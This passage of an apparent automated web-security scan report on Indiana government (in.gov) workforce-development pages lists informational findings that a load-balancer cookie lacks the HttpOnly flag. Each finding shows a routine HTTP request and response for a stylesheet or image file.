The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne//styles/index_styles.css HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:30 GMT
Server: Apache
Last-Modified: Fri, 10 Dec 2010 18:30:57 GMT
ETag: "69aa66-46a-497128e277a40"
Accept-Ranges: bytes
Content-Length: 1130
Content-Type: text/css
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:30 GMT; path=/

ul {
   padding-left:14px;
   padding-bottom:25px;
}

#WorkOneNews {
   color:#FFFFFF;
   font-size:12px;
}

#WorkOneNews h3 {
   font-size:16px;
   border-bottom:dashed 1px #b9d5f4;
   margin:0px;
   p
...[SNIP]...

14.547. http://www.in.gov/dwd/WorkOne//styles/layout.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//styles/layout.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne//styles/layout.css HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:30 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 17:36:10 GMT
ETag: "69aa67-7ea-4987be3609680"
Accept-Ranges: bytes
Content-Length: 2026
Content-Type: text/css
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:30 GMT; path=/

body {

}

.bottomlinks {
   margin-top: 10px;
   margin-bottom: 5px;
   font-family: Arial, Helvetica, sans-serif;
   text-align:right;
   color: white;
}

#wrapper2 {
   background: none;
   margin:
...[SNIP]...

14.548. http://www.in.gov/dwd/WorkOne//styles/reset.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//styles/reset.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne//styles/reset.css HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:29 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 17:36:10 GMT
ETag: "69aa68-440-4987be3609680"
Accept-Ranges: bytes
Content-Length: 1088
Content-Type: text/css
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:29 GMT; path=/

/*
* Reset Stylesheet
* Creates a baseline that smooths out differences imposed by various default browser styles
*
* Thanks to http://meyerweb.com/eric/thoughts/2007/05/01/reset-reloaded/
*
...[SNIP]...

14.549. http://www.in.gov/dwd/WorkOne//styles/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//styles/styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne//styles/styles.css HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:30 GMT
Server: Apache
Last-Modified: Fri, 10 Dec 2010 17:53:25 GMT
ETag: "69aa69-9f6-4971207ecaf40"
Accept-Ranges: bytes
Content-Length: 2550
Content-Type: text/css
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:30 GMT; path=/

img {
   border:none;
}

body {
   font-family:Arial, Helvetica, sans-serif;
   font-size:14px;
   color:#000000;
   line-height:125%;
   margin-top:25px;
   margin-bottom:25px;
   background:#c0c0c0 url(.
...[SNIP]...

14.550. http://www.in.gov/dwd/WorkOne/images/index_arrow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne/images/index_arrow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne/images/index_arrow.png HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:32 GMT
Server: Apache
Last-Modified: Fri, 10 Dec 2010 17:53:27 GMT
ETag: "8651d2-f5f-49712080b33c0"
Accept-Ranges: bytes
Content-Length: 3935
Content-Type: image/png
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:32 GMT; path=/

.PNG
.
...IHDR...n................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

14.551. http://www.in.gov/dwd/WorkOne/images/index_title.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne/images/index_title.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne/images/index_title.png HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:31 GMT
Server: Apache
Last-Modified: Fri, 10 Dec 2010 17:53:28 GMT
ETag: "8651d7-36ba-49712081a7600"
Accept-Ranges: bytes
Content-Length: 14010
Content-Type: image/png
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:31 GMT; path=/

.PNG
.
...IHDR...}...W......9.....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

14.552. http://www.in.gov/dwd/WorkOne/scripts//dwd/WorkOne/scripts/indicator.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne/scripts//dwd/WorkOne/scripts/indicator.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne/scripts//dwd/WorkOne/scripts/indicator.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 15:03:32 GMT
Server: Apache
Location: http://www.IN.gov/ai/errors/dwd_404.html
Content-Length: 224
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:32 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.IN.gov/ai/errors/dwd_404.html">here<
...[SNIP]...

14.553. http://www.in.gov/dwd/images/GovDev_Left_Logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/images/GovDev_Left_Logo.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/images/GovDev_Left_Logo.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:01 GMT
Server: Apache
Last-Modified: Mon, 27 Dec 2010 16:14:52 GMT
ETag: "1a1f08-3924-49866a2c8d700"
Accept-Ranges: bytes
Content-Length: 14628
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:01 GMT; path=/

......JFIF.....d.d......Ducky.......d......Adobe.d................................................................................................................................................./....
...[SNIP]...

14.554. http://www.in.gov/dwd/images/amber_void.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/images/amber_void.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/images/amber_void.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:04 GMT
Server: Apache
Last-Modified: Mon, 11 Apr 2011 14:59:45 GMT
ETag: "1015c4d-1503-4a0a5d37bda40"
Accept-Ranges: bytes
Content-Length: 5379
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:04 GMT; path=/

......JFIF.....d.d......Ducky.......X......Adobe.d................................................................                                        ................                                                                                                                                                                                                    ......5....
...[SNIP]...

14.555. http://www.in.gov/dwd/images/col2_top_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/images/col2_top_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/images/col2_top_bg.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:04 GMT
Server: Apache
Last-Modified: Mon, 11 Apr 2011 15:03:23 GMT
ETag: "12d1e57-4a1c-4a0a5e07a44c0"
Accept-Ranges: bytes
Content-Length: 18972
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:04 GMT; path=/

......JFIF.....d.d......Ducky.......X......Adobe.d................................................................                                        ................                                                                                                                                                                                                    ......5.6..
...[SNIP]...

14.556. http://www.in.gov/dwd/images/col3_top_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/images/col3_top_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/images/col3_top_bg.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:06 GMT
Server: Apache
Last-Modified: Mon, 11 Apr 2011 15:03:37 GMT
ETag: "11554f1-1fd0-4a0a5e14fe440"
Accept-Ranges: bytes
Content-Length: 8144
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:06 GMT; path=/

GIF89a........O).*.."..    ..$..    ....2.....2..6..0........2.....-..<../.M._.0..4..&.>..8..-..'..6..+..4..0.. .......;sM............DnRA`K.P*)a;:nKd.o.B#D|V'X7@xR.G!%V5...HZ.J&2jDI.[!Y3.K%.f@?tP5bC....
...[SNIP]...

14.557. http://www.in.gov/dwd/images/faq_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/images/faq_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/images/faq_bg.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:06 GMT
Server: Apache
Last-Modified: Mon, 11 Apr 2011 14:59:22 GMT
ETag: "1c9253-6e2f-4a0a5d21ce680"
Accept-Ranges: bytes
Content-Length: 28207
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:06 GMT; path=/

......JFIF.....d.d......Ducky.......X......Adobe.d................................................................                                        ................                                                                                                                                                                                                    ...........
...[SNIP]...

14.558. http://www.in.gov/dwd/images/link_header_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/images/link_header_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/images/link_header_bg.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:04 GMT
Server: Apache
Last-Modified: Mon, 11 Apr 2011 15:03:13 GMT
ETag: "12d1e65-2f7-4a0a5dfe1ae40"
Accept-Ranges: bytes
Content-Length: 759
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:04 GMT; path=/

......JFIF.....d.d......Ducky.......X......Adobe.d................................................................                                        ................                                                                                                                                                                                                    ...........
...[SNIP]...

14.559. http://www.in.gov/dwd/images/navMore.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/images/navMore.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/images/navMore.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000; WT_FPC=id=173.193.214.243-3084977536.30148309:lv=1304175874332:ss=1304175862985

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:14 GMT
Server: Apache
Last-Modified: Mon, 11 Apr 2011 15:03:20 GMT
ETag: "1015c61-74-4a0a5e04c7e00"
Accept-Ranges: bytes
Content-Length: 116
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:14 GMT; path=/

GIF89a..........


..........................................!.......,..........!..I..8......$..........a... ..||..;

14.560. http://www.in.gov/dwd/images/subscribe_dwd.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/images/subscribe_dwd.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/images/subscribe_dwd.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:06 GMT
Server: Apache
Last-Modified: Mon, 11 Apr 2011 15:03:06 GMT
ETag: "1015c5f-22ce-4a0a5df76de80"
Accept-Ranges: bytes
Content-Length: 8910
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:06 GMT; path=/

......JFIF.....d.d......Ducky.......X......Adobe.d................................................................                                        ................                                                                                                                                                                                                    ......,....
...[SNIP]...

14.561. http://www.in.gov/dwd/images/uplink_btn_rdax_100_rdax_100.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/images/uplink_btn_rdax_100_rdax_100.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/images/uplink_btn_rdax_100_rdax_100.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:01 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 18:22:12 GMT
ETag: "1015c5d-79d3-4a1fea2cdbd00"
Accept-Ranges: bytes
Content-Length: 31187
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:01 GMT; path=/

......JFIF.....H.H.....C....................................................................C...........................................................................................................
...[SNIP]...

14.562. http://www.in.gov/dwd/images/want_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/images/want_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/images/want_bg.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:08 GMT
Server: Apache
Last-Modified: Mon, 11 Apr 2011 15:04:08 GMT
ETag: "11554f4-6e4d-4a0a5e328ea00"
Accept-Ranges: bytes
Content-Length: 28237
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:08 GMT; path=/

......JFIF.....d.d......Ducky.......X......Adobe.d................................................................                                        ................                                                                                                                                                                                                    ...........
...[SNIP]...

14.563. http://www.in.gov/dwd/images/widget2_rdax_100_rdax_100.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/images/widget2_rdax_100_rdax_100.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/images/widget2_rdax_100_rdax_100.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
